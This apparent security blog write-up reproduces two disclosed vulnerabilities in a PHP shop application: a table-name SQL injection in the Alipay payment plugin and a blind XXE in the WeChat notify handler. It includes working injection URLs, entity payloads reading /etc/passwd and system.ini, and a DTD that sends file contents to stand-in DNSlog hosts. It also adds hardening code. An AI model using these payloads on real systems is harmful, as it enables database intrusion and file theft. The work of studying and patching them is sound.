I studied XSS bypasses a few days ago; over the past two days I have been going deeper into auditing for SQL injection.
First, run an automated audit.
The scanner flagged a suspected variable-overwrite point.
Clicking through, it turns out to be code that removes the hazard of register_globals.
Briefly: when that php.ini setting is On, every parameter sent by the client is registered as a global variable, so request parameters can overwrite the application's own variables, which in turn leads to all sorts of vulnerabilities, such as authentication bypasses and unauthorized access.
If the code detects that register_globals is on, it unsets the variables that were registered that way.
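The following is an added example, not the project's code or anything from the page: it shows the overwrite that register_globals caused and a cleanup routine of the kind the audit found. Because register_globals was removed in PHP 5.4, the overwrite is emulated with extract(), which turns request keys into variables the same way; function and variable names are assumptions.

```php
<?php
// Added example, not the project's code. register_globals was removed in
// PHP 5.4, so the overwrite is emulated here with extract(), which turns
// request keys into variables the same way. All names are assumptions.

// What register_globals=On did: a request key silently becomes a variable,
// so ?is_admin=1 replaces the default assigned just before it.
function emulate_register_globals(array $request)
{
    $is_admin = false;
    extract($request);          // EXTR_OVERWRITE is the default
    return $is_admin;
}

// Cleanup of the kind the audit found: when the setting is on, unset every
// global whose name also appears in one of the request arrays, without
// touching the superglobals themselves.
function unregister_globals()
{
    if (!ini_get('register_globals')) {
        return 0;                // nothing to do on PHP >= 5.4
    }
    $removed = 0;
    $sources = [$_GET, $_POST, $_COOKIE, $_FILES, $_SERVER, $_ENV];
    if (isset($_SESSION) && is_array($_SESSION)) {
        $sources[] = $_SESSION;
    }
    foreach ($sources as $arr) {
        foreach (array_keys($arr) as $key) {
            if ($key !== 'GLOBALS' && array_key_exists($key, $GLOBALS)) {
                unset($GLOBALS[$key]);
                $removed++;
            }
        }
    }
    return $removed;
}

var_dump(emulate_register_globals(['is_admin' => '1'])); // string(1) "1"
var_dump(emulate_register_globals([]));                  // bool(false)
```

The first function is only a demonstration of the mechanism; the second is the shape of the defensive code the scanner flagged as a "variable overwrite" point, which is why that lead was a false positive.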
I followed the automated audit's leads through several flagged points, but none of them were exploitable... I will come back and audit again when I have more time.
Next, reproduce the two vulnerabilities disclosed for this version.
1. CVE-2019-9762 (SQL injection)
(1) Cause of the vulnerability
The vulnerability is at line 35 of include\plugin\payment\alipay\pay.php.
The function there accepts a parameter, but it is not the raw request parameter.
Note the common file included at the top.
Open common:
The GPC arrays ($_GET, $_POST, $_COOKIE) have been rewritten: the values are copied under various prefixes, and a backslash is added in front of special characters.
The first function, pe_dbhold, is the safe-processing step for incoming parameters.
It recurses into nested arrays, uses the $exc parameter to decide whether HTML entity encoding is also applied, and prefixes every special character with a backslash.
The order_table function in the middle is what makes this SQL injection a little special.
It first checks whether the incoming value contains "_". If it does, everything before the first "_" is appended to "order_" to form the table name.
Otherwise it simply returns "order".
Now the core query function, pe_select:
In short, this is where the conditional clauses are concatenated.
The key point comes next: the table name is spliced into the statement wrapped in backticks, but nothing escapes backticks inside the passed value (the escaping above does not touch them).
So the injection point is the table name.
(2) Exploiting the vulnerability
Since the code splices everything before the first "_" of the parameter value into the table name, the PoC needs some special handling.
That is, a "_" has to be placed in the comment part of the PoC, so that the table-name splicing completes and the trailing code is commented out.
ORDER BY shows the query has 12 columns.
The echo point is in the lower right corner.
Locate the specific echo point:
/include/plugin/payment/alipay/pay.php?id=pay`%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12%20order%20by%201--%20_
After that you can read the database name and other information, but for the reason above you cannot use any payload that itself contains "_" (information_schema, for instance), because everything after the first "_" is discarded.
You can, however, brute-force table names,
for example:
/include/plugin/payment/alipay/pay.php?id=pay`%20where%201=1%20and%20exists%20(select*%20from%20***)%23_
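The following is an added example, not code from the page or from the project: a simplified PHP model of the chain described in the cause and exploitation sections (the escaping in common, order_table(), pe_select()), reconstructed from the description above. The function bodies, the assumed WHERE clause and the allow-list in the hardened variant are assumptions. It shows why the first PoC's only "_" has to sit after the comment marker, why payloads containing "_" get truncated, and one way to close the hole.

```php
<?php
// Added example: a simplified model of the splicing chain described above.
// It is NOT the project's code. model_dbhold(), model_order_table() and
// model_select() are reconstructed from the page's description; the WHERE
// clause and the allow-list in safe_order_table() are assumptions.

// Models the escaping done in common (pe_dbhold): backslash before ' " \ and
// NUL, as addslashes() does. The backtick is not in that set.
function model_dbhold($value)
{
    if (is_array($value)) {
        return array_map('model_dbhold', $value);
    }
    return addslashes((string) $value);
}

// Models order_table(): text before the first "_" is appended to "order_";
// a value without "_" selects the plain "order" table.
function model_order_table($value)
{
    $pos = strpos($value, '_');
    return $pos === false ? 'order' : 'order_' . substr($value, 0, $pos);
}

// Models the statement assembly in pe_select(): the table name is wrapped in
// backticks with no further escaping, the conditions are concatenated.
function model_select($table, array $where)
{
    $conds = [];
    foreach ($where as $col => $val) {
        $conds[] = "`$col` = '$val'";
    }
    return "SELECT * FROM `$table` WHERE " . implode(' AND ', $conds);
}

// Hardened variant: the suffix must be a plain identifier AND one of the
// table suffixes the application actually has (assumed list), so no SQL
// metacharacter can reach the statement.
function safe_order_table($value, array $allowed = ['pay'])
{
    $pos = strpos($value, '_');
    if ($pos === false) {
        return 'order';
    }
    $suffix = substr($value, 0, $pos);
    if (!preg_match('/^[a-z0-9]+$/', $suffix) || !in_array($suffix, $allowed, true)) {
        throw new InvalidArgumentException("rejected table suffix: $suffix");
    }
    return 'order_' . $suffix;
}

// URL-decoded value of the page's first PoC (id=pay`%20union ... --%20_).
$id = model_dbhold('pay` union select 1,2,3,4,5,6,7,8,9,10,11,12 order by 1-- _');
echo model_select(model_order_table($id), ['status' => '1']), PHP_EOL;
// SELECT * FROM `order_pay` union select 1,2,3,4,5,6,7,8,9,10,11,12 order by 1-- ` WHERE `status` = '1'
// The closing backtick and the real WHERE clause are swallowed by the comment.

// Any earlier "_" truncates the payload, which is why names such as
// information_schema or table_name cannot be used directly:
echo model_order_table('pay` union select table_name-- _'), PHP_EOL;
// order_pay` union select table

try {
    safe_order_table($id);
} catch (InvalidArgumentException $e) {
    echo 'hardened: ', $e->getMessage(), PHP_EOL;
}
```

Escaping is the wrong tool for identifiers: addslashes-style escaping protects string literals, not backtick-quoted names, so the fix has to validate the table suffix against a fixed pattern and allow-list rather than add one more character to the escape set.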
2. CVE-2019-9761 (XXE)
1. Basic knowledge
1. First, a word about XML
XML is designed for transmitting and storing data. Its general structure consists of a DTD part and a document (body) part.
The DTD declares the structure of the XML document; it can be declared inline in the XML document or referenced from an external file.
(1) Declared internally, the format is
<!DOCTYPE root-element [element-declarations]>
For example
<?xml version="1.0"?>
<!DOCTYPE note [
<!ELEMENT note (to,from,heading,body)>
<!ELEMENT to (#PCDATA)>
<!ELEMENT from (#PCDATA)>
<!ELEMENT heading (#PCDATA)>
<!ELEMENT body (#PCDATA)>
]>
<note>
<to>George</to>
<from>John</from>
<heading>Reminder</heading>
<body>Don't forget the meeting!</body>
</note>
Comparing the two, the DTD defines the document type (note, via DOCTYPE), the document's elements (the four ELEMENT declarations), and each element's content type (#PCDATA).
(2) Referenced from an external file
<!DOCTYPE root-element SYSTEM "filename">
The dtd file is as follows
<!ELEMENT note (to,from,heading,body)>
<!ELEMENT to (#PCDATA)>
<!ELEMENT from (#PCDATA)>
<!ELEMENT heading (#PCDATA)>
<!ELEMENT body (#PCDATA)>
External reference:
<?xml version="1.0"?>
<!DOCTYPE note SYSTEM "note.dtd">
<note>
<to>George</to>
<from>John</from>
<heading>Reminder</heading>
<body>Don't forget the meeting!</body>
</note>
2. DTD entities (ENTITY)
(1) Internal entities:
<!ENTITY entity-name "entity value">
DTD example:
<!ENTITY writer "Bill Gates">
<!ENTITY copyright "Copyright W3School.com.cn">
XML example:
<author>&writer;&copyright;</author>
(2) External entities
<!ENTITY entity-name SYSTEM "URI/URL">
dtd file:
<!ENTITY writer SYSTEM "http://*******/dtd/entities.dtd">
<!ENTITY copyright SYSTEM "http://********/dtd/entities.dtd">
XML example:
<author>&writer;&copyright;</author>
Entities also come in two kinds: general entities and parameter entities.
General entities:
<!ENTITY entity-name SYSTEM "entity content">
Reference:
&entity-name;
For example:
<?xml version="1.0"?>
<!DOCTYPE ANY [
<!ENTITY test SYSTEM "file:///etc/passwd">
]>
<abc>&test;</abc>
Parameter entities:
<!ENTITY % entity-name SYSTEM "entity content">
Reference (only allowed inside the DTD):
%entity-name;
For example:
<?xml version="1.0"?>
<!DOCTYPE a [
<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=c:/test/1.txt">
<!ENTITY % dtd SYSTEM "http://localhost/evil.xml">
%dtd;
%send;
]>
<a></a>
3. About the vulnerability
The single most important factor for XXE is whether external entities can be loaded.
In PHP, if libxml >= 2.9.0, the equivalent of
libxml_disable_entity_loader(true);
is in effect by default. That is, external entities are not loaded and there is no XXE unless the application re-enables the loader. (The vulnerable environment below does resolve external entities.)
2. Cause of the vulnerability
Navigate to \include\plugin\payment\wechat\notify_url.php
Then locate wechat_getxml(), which simply returns the result of pe_getxml.
Keep following it:
$xml is found to hold the raw POST body (php://input).
It is then parsed with simplexml_load_string() without disabling the resolution of external entities.
3. Exploiting the vulnerability
Construct the PoC plus a DTD file for it to reference (hosted on a server reachable from the target).
Since there is no echo here, the data has to be bounced out of band to a DNSlog server.
dtd file:
<?xml version="1.0" encoding="utf-8"?>
<!ENTITY % all
"<!ENTITY send SYSTEM 'http://your.dnslog/?%file;'>"
>
%all;
poc:
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE roottag[
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=file:///C:/Windows/system.ini">
<!ENTITY % dtd SYSTEM "http://yourhost/1.dtd">
%dtd;
]>
<roottag>&send;</roottag>
The XML above references the external DTD file (tested locally here). Note that the XML declaration with version and encoding must be included, otherwise the data is not bounced out.
The PHP filter wrapper then loads the contents of the sensitive file into the DNSlog URL.
The base64-encoded data then shows up in the access log on the DNSlog platform.
Switching to a newer PHP build with libxml >= 2.9.0, the parse instead fails with an error
saying that the entity "send" is undefined, i.e. the external entity was not resolved.
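The following is an added example, not the project's code and not from the page: a hardened replacement for the pattern found in notify_url.php (simplexml_load_string() on the raw php://input body with default options). It refuses any body carrying a DTD, which is what every variant of the exploit above depends on, and additionally turns the entity loader off on old PHP/libxml builds where it is still on by default. The function name, the benign notification's field names and the test inputs are assumptions.

```php
<?php
// Added example, not the project's code: a hardened replacement for the
// pattern found in notify_url.php (simplexml_load_string() on the raw
// php://input body with default options). Function and field names are
// assumptions.

function parse_untrusted_xml(string $raw)
{
    // 1. A payment notification never needs a DTD, and every XXE variant,
    //    including the blind parameter-entity one above, needs one. Reject
    //    it outright instead of relying on parser flags.
    if (preg_match('/<!(?:DOCTYPE|ENTITY)/i', $raw)) {
        throw new RuntimeException('XML with DOCTYPE/ENTITY declarations rejected');
    }

    // 2. Defence in depth for old libxml/PHP builds where the loader is on:
    //    switch it off for the duration of the parse. With libxml >= 2.9.0
    //    this is already the default, and PHP 8 deprecates the call.
    $previous = null;
    if (PHP_VERSION_ID < 80000) {
        $previous = libxml_disable_entity_loader(true);
    }
    $keepErrors = libxml_use_internal_errors(true);

    try {
        // LIBXML_NONET forbids any network fetch while parsing. LIBXML_NOENT
        // is deliberately absent so entity substitution stays off.
        $xml = simplexml_load_string($raw, 'SimpleXMLElement', LIBXML_NONET);
        if ($xml === false) {
            $err = libxml_get_last_error();
            throw new RuntimeException('invalid XML: ' . ($err ? trim($err->message) : 'parse error'));
        }
        return $xml;
    } finally {
        libxml_clear_errors();
        libxml_use_internal_errors($keepErrors);
        if ($previous !== null) {
            libxml_disable_entity_loader($previous);
        }
    }
}

// Constructed inputs: a benign notification (field names assumed) and the
// shape of the page's PoC.
$benign = '<?xml version="1.0" encoding="utf-8"?>'
        . '<xml><return_code>SUCCESS</return_code><out_trade_no>20190311001</out_trade_no></xml>';
$poc = '<?xml version="1.0" encoding="utf-8"?>'
     . '<!DOCTYPE roottag[<!ENTITY % dtd SYSTEM "http://yourhost/1.dtd">%dtd;]>'
     . '<roottag>&send;</roottag>';

echo (string) parse_untrusted_xml($benign)->out_trade_no, PHP_EOL;   // 20190311001
try {
    parse_untrusted_xml($poc);
} catch (RuntimeException $e) {
    echo $e->getMessage(), PHP_EOL;   // XML with DOCTYPE/ENTITY declarations rejected
}
```

The DOCTYPE check is the part that does the real work: the version-dependent behaviour described above (exploitable on old libxml, "entity send undefined" on new libxml) is exactly why a handler should not rely on the parser's default alone.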